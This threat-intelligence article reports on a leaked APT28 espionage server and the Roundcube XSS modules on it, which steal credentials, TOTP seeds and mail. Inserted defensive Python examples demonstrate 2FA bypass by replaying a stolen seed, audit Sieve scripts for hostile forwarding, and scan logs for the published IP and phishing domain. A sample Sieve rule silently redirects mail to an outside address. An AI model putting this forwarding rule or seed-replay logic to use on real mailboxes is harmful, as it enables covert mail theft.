FancyBear Server Leak Exposes Stolen Credentials, 2FA Secrets, NATO Targets

By Declan Murphy, March 18, 2026
FancyBear's latest operational security failure has exposed a live Russian espionage server full of stolen credentials, 2FA secrets, and detailed insight into the ongoing targeting of European government and military networks.

The exposed infrastructure, tied to APT28/FancyBear and previously reported by CERT-UA and Hunt.io, reveals both the scale of the compromises and the carelessness of a threat actor often described as "sophisticated."

Researchers from Ctrl-Alt-Intel, building on Hunt.io's "Operation Roundish" findings, identified a second open directory on the same C2 server at 203.161.50[.]145, hosted on Namecheap infrastructure.

This open directory contained C2 source code, payloads, logs, and exfiltrated data, giving rare visibility into FancyBear operations from the attacker's own server.

Analysts found more than 2,800 exfiltrated emails, over 240 credential sets (including TOTP 2FA secrets), around 140 persistent forwarding rules, and over 11,500 harvested contact addresses.

Victim mailboxes belonged to government and military entities in Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia, including regional Ukrainian prosecutors, the Romanian Air Force, and Greece's National Defence General Staff.

Several of these countries are NATO members or closely aligned with NATO, which fits Russia's strategic interest in Ukraine-related military logistics and support.

    FancyBear Server

CERT-UA had already tied the same IP address, 203.161.50[.]145, to APT28 activity in advisories from late 2024, covering Roundcube exploitation and a ClickFix / fake reCAPTCHA spear-phishing chain.

Censys Service History for `203.161.50[.]145` (Source: Hunt.io).

Despite this public exposure, FancyBear continued to operate from the same server for roughly 500 days, into early 2026, contradicting the common assumption that APT infrastructure is quickly rotated once burned.

Censys telemetry and Hunt.io captures show multiple open directories on port 8889 between January and March 2026, one of which was later found by Ctrl-Alt-Intel to host additional tooling and logs.

The root cause was a basic but significant OPSEC mistake: leaving HTTP open directories exposed while staging payloads and exfiltrated data.

    • These dates are when Censys scanned and identified the open ports; the directories were very likely open before and after those times.
    • This threat actor had multiple open directories from January to March 2026, each of them on port 8889.

The open directory scanned and archived by Hunt.io on 13 January 2026 at 10:41 UTC was located in a different directory from the one discussed by Ctrl-Alt-Intel.

Hunt.io archive from 13 January (Source: Hunt.io).

This allowed defenders not only to download the full toolkit but also to observe campaign evolution and operator behaviour in near real time as files and logs were updated.

The toolkit centres on JavaScript payloads injected into Roundcube (and, in a newly documented variant, SquirrelMail) via XSS vulnerabilities. Once executed in a victim's browser, the Roundcube payload (the "worker.js" family) can silently:

    • Identify the logged-in user.
    • Steal credentials using hidden auto-fill forms and click-based exfiltration.
    • Bulk-exfiltrate entire Inbox and Sent folders as .eml files.
    • Load modular scripts to add Sieve forwarding rules, steal address books, and extract TOTP secrets.

One module, keyTwoAuth.js, targets the twofactor_gauthenticator plugin to pull the TOTP seed and recovery codes directly from the 2FA settings page, then exfiltrates them in base64 form.

C2 logs show hundreds of entries where FancyBear successfully captured valid TOTP secrets. Because a TOTP seed is all that is needed to generate codes for any future time window, a captured seed is a long-term bypass of 2FA on that mailbox until the seed is re-enrolled, not a one-off.
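To make concrete why a leaked seed is a lasting bypass rather than a single-use credential, here is an added Python example (not code from the article, the leaked toolkit, or the Roundcube plugin). It implements RFC 6238 TOTP, simulates the attacker regenerating valid codes from the exfiltrated base64 record, and shows that the remediation is re-enrolment with a fresh seed. The seed is the RFC 6238 reference key, and the record layout (base64 of the base32 seed string) is an assumption for the example; the real C2 log format is not described on this page.

```python
import base64
import hashlib
import hmac
import secrets
import struct


def b32_decode(seed_b32: str) -> bytes:
    """Decode a base32 TOTP seed, tolerating the unpadded form authenticator apps use."""
    seed_b32 = seed_b32.strip().replace(" ", "").upper()
    return base64.b32decode(seed_b32 + "=" * (-len(seed_b32) % 8))


def totp(seed_b32: str, timestamp: int, digits: int = 6, step: int = 30) -> str:
    """RFC 6238 TOTP (HMAC-SHA1) for the 30-second window containing `timestamp`."""
    counter = timestamp // step
    mac = hmac.new(b32_decode(seed_b32), struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                        # dynamic truncation, RFC 4226 s5.3
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def verify(seed_b32: str, code: str, timestamp: int, window: int = 1, step: int = 30) -> bool:
    """Server-side check with the usual +/-1 step tolerance for clock drift."""
    return any(
        hmac.compare_digest(totp(seed_b32, timestamp + k * step, step=step), code)
        for k in range(-window, window + 1)
    )


def seed_from_exfil(blob_b64: str) -> str:
    """Recover the seed from the base64 record the C2 receives.
    Record layout is an assumption for this example: base64 of the raw base32 seed."""
    return base64.b64decode(blob_b64).decode("ascii")


def rotate_seed() -> str:
    """Remediation: issue a fresh 160-bit seed; codes derived from the old one stop verifying."""
    return base64.b32encode(secrets.token_bytes(20)).decode("ascii").rstrip("=")


# Constructed example, not real victim data: the RFC 6238 reference key
# ("12345678901234567890") as the base32 string twofactor_gauthenticator would
# hold, and the record keyTwoAuth.js-style exfiltration would produce from it.
VICTIM_SEED_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"
EXFIL_BLOB = base64.b64encode(VICTIM_SEED_B32.encode()).decode()


def attacker_passes_2fa_at(timestamp: int) -> bool:
    """What the stolen seed buys: a code the server accepts, for any window, indefinitely."""
    stolen = seed_from_exfil(EXFIL_BLOB)
    return verify(VICTIM_SEED_B32, totp(stolen, timestamp), timestamp)


if __name__ == "__main__":
    for t in (59, 1111111109, 2000000000):       # RFC 6238 test times
        print(t, totp(VICTIM_SEED_B32, t), "attacker passes:", attacker_passes_2fa_at(t))
    fresh = rotate_seed()
    print("old-seed code accepted after rotation:",
          verify(fresh, totp(VICTIM_SEED_B32, 2000000000), 2000000000))
```

Resetting the user's password does nothing here; only `rotate_seed()` (re-enrolling the authenticator) and revoking the stored recovery codes close the bypass.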

The phishing emails contained a link to the domain docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com, where John Hammond's reCAPTCHA Phish POC was used to deliver Metasploit payloads calling back to the C2 IP address 203.161.50[.]145.

ClickFix Execution Chain, ref. CERT-UA (Source: Hunt.io).

Another module, addRedirectMailBox.js, abuses Roundcube's ManageSieve integration to create an always-on forwarding rule that silently copies every incoming email to an attacker-controlled ProtonMail account. Because the rule lives in the user's Sieve script on the mail server, it persists even after the initial XSS path is closed and survives a password reset.
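Forwarding rules of this kind are invisible in the webmail UI unless someone opens the filters page, so the practical check is to audit the stored Sieve scripts themselves. The following is an added Python example (not code from the article, Hunt.io, or Ctrl-Alt-Intel): it parses `redirect` actions out of Sieve scripts, flags destinations outside the organisation's domains, and ranks `:copy` redirects highest, since `:copy` leaves the original in the Inbox and is what makes the forwarding silent. The sample scripts, user names and the internal domain `example.gov` are constructed; the real rule contents from the leak are not reproduced on this page.

```python
import re
from dataclasses import dataclass

# Sieve `redirect` action with optional tagged arguments (":copy", ":list", ...)
# and a quoted address, e.g.   redirect :copy "someone@example.com";
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:[A-Za-z]+)*)\s+"([^"]+)"\s*;')
COMMENT_RE = re.compile(r'#[^\n]*|/\*.*?\*/', re.S)   # Sieve hash and bracketed comments


@dataclass
class Finding:
    user: str
    address: str
    copy: bool       # ':copy' keeps the original in the Inbox, so the victim notices nothing
    external: bool   # destination outside the organisation's domains


def find_redirects(script: str):
    """Yield (address, has_copy_tag) for every redirect action in one Sieve script."""
    for tags, address in REDIRECT_RE.findall(COMMENT_RE.sub("", script)):
        yield address.strip().lower(), ":copy" in tags.lower()


def audit_sieve(scripts: dict, internal_domains: set) -> list:
    """Flag redirects that leave the organisation, silent ':copy' ones first."""
    internal = {d.lower() for d in internal_domains}
    findings = []
    for user, script in scripts.items():
        for address, copy in find_redirects(script):
            domain = address.rsplit("@", 1)[-1]
            if domain not in internal:
                findings.append(Finding(user, address, copy, external=True))
    # The addRedirectMailBox.js pattern is an external ':copy' redirect: sort it to the top.
    findings.sort(key=lambda f: (not f.copy, f.user))
    return findings


# Constructed sample scripts, keyed by mailbox owner, as a server-side collector
# would read them from each user's Sieve storage. Contents are illustrative only.
SAMPLE_SCRIPTS = {
    "prosecutor1": (
        'require ["copy"];\n'
        '# rule injected through ManageSieve, never shown to the user\n'
        'if true { redirect :copy "archive.backup7713@proton.me"; }\n'
    ),
    "clerk2": (
        'require ["fileinto"];\n'
        'if header :contains "subject" "[ticket]" { redirect "helpdesk@example.gov"; }\n'
    ),
    "officer3": (
        '/* holiday cover plus a personal forward */\n'
        'redirect "deputy@example.gov";\n'
        'redirect "personal.mail@outlook.com";\n'
    ),
}


def audit_sample() -> list:
    return audit_sieve(SAMPLE_SCRIPTS, {"example.gov"})


if __name__ == "__main__":
    for f in audit_sample():
        print(f"{f.user}: {'SILENT COPY' if f.copy else 'redirect'} -> {f.address}")
```

On a Dovecot host the scripts to feed in are the active `.dovecot.sieve` per user (or whatever `sieve` location is configured); with a Sieve capability list that includes `copy`, the combination of an external domain and `:copy` is the highest-priority finding, and the same run gives you the ProtonMail-style addresses to block at the MTA.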

    Geopolitical and defensive implications

The victim set aligns closely with states providing military assistance, logistics, or training linked to Ukraine, including Romania, Bulgaria, Greece, and Ukraine itself, supporting the view that target selection is driven by regional military relevance rather than random opportunism.

SquirrelMail Victim Identification Source Snippet (Source: Hunt.io).

The campaign also overlaps with ESET's previously reported "Operation RoundPress" and CERT-UA's ClickFix / fake reCAPTCHA phishing operations, reinforcing the attribution to GRU-linked APT28/FancyBear.

For defenders, this incident underlines several priorities: patching and hardening webmail platforms such as Roundcube and SquirrelMail against the XSS paths used here, disabling or restricting ManageSieve and risky plugins where possible, auditing existing Sieve scripts for forwarding rules, re-enrolling 2FA for any account whose seed may have been exposed, and monitoring for indicators like zhblz[.]com and 203.161.50[.]145.
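The two indicators above illustrate a matching detail that is easy to get wrong: the phishing host is a deep subdomain of zhblz[.]com that begins with `docs.google.com`, so a naive substring search for the lookalike part would flag Google and miss the actual attacker domain. The following is an added Python example (not a tool from the article or from Hunt.io): it refangs the published indicators, matches hostnames on a label boundary against the IOC domain and IPv4 tokens against the C2 address, and runs over a few constructed proxy log lines. The log format and client addresses are assumptions for the example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

DEFANG_RE = re.compile(r"\[\.\]|\(\.\)|\[dot\]|\{\.\}")
URL_RE = re.compile(r"https?://\S+", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def refang(ioc: str) -> str:
    """Turn '203.161.50[.]145' / 'zhblz[.]com' back into matchable values."""
    return DEFANG_RE.sub(".", ioc.strip()).replace("hxxp", "http").lower()


def load_iocs(raw):
    """Split a published indicator list into IP addresses and domains."""
    ips, domains = set(), set()
    for ioc in map(refang, raw):
        try:
            ips.add(str(ipaddress.ip_address(ioc)))
        except ValueError:
            domains.add(ioc.lstrip("."))
    return ips, domains


def host_matches(host: str, domains: set) -> bool:
    """True if host is an IOC domain or any subdomain of one (suffix on a label boundary)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def scan_line(line: str, ips: set, domains: set) -> list:
    """Return the IOCs hit by one proxy/firewall log line (empty list if clean)."""
    hits = []
    for url in URL_RE.findall(line):
        host = urlsplit(url).hostname or ""
        if host_matches(host, domains):
            hits.append(host)
    for ip in IPV4_RE.findall(line):
        if ip in ips:
            hits.append(ip)
    return hits


def scan(lines, raw_iocs) -> list:
    ips, domains = load_iocs(raw_iocs)
    return [(line, scan_line(line, ips, domains)) for line in lines]


# Indicators as published on this page (defanged).
IOCS = ["203.161.50[.]145", "zhblz[.]com"]

# Constructed proxy log lines (timestamp, client, method, target, status); not real telemetry.
SAMPLE_LOG = [
    "2026-03-10T12:00:01Z 10.20.30.40 GET http://docs.google.com.spreadsheets.d."
    "1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz.com/ 200",
    "2026-03-10T12:00:09Z 10.20.30.40 CONNECT 203.161.50.145:8889 200",
    "2026-03-10T12:01:00Z 10.20.30.41 GET https://docs.google.com/spreadsheets/d/abc 200",
    "2026-03-10T12:02:00Z 10.20.30.42 GET http://zhblz.com.example.org/ 200",
]


def scan_sample() -> list:
    return scan(SAMPLE_LOG, IOCS)


if __name__ == "__main__":
    for line, hits in scan_sample():
        print("HIT " if hits else "ok  ", hits, line[:70])
```

Lines 3 and 4 of the sample are the two false-positive traps: the legitimate Google host, and a host that merely contains the IOC string without being under it. Both come back clean, while the real lookalike and the port-8889 connection to the C2 are flagged.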

Crucially, it shows that even high-end state actors can make simple OPSEC mistakes, creating rare windows in which defenders can see, and disrupt, espionage operations from the inside.
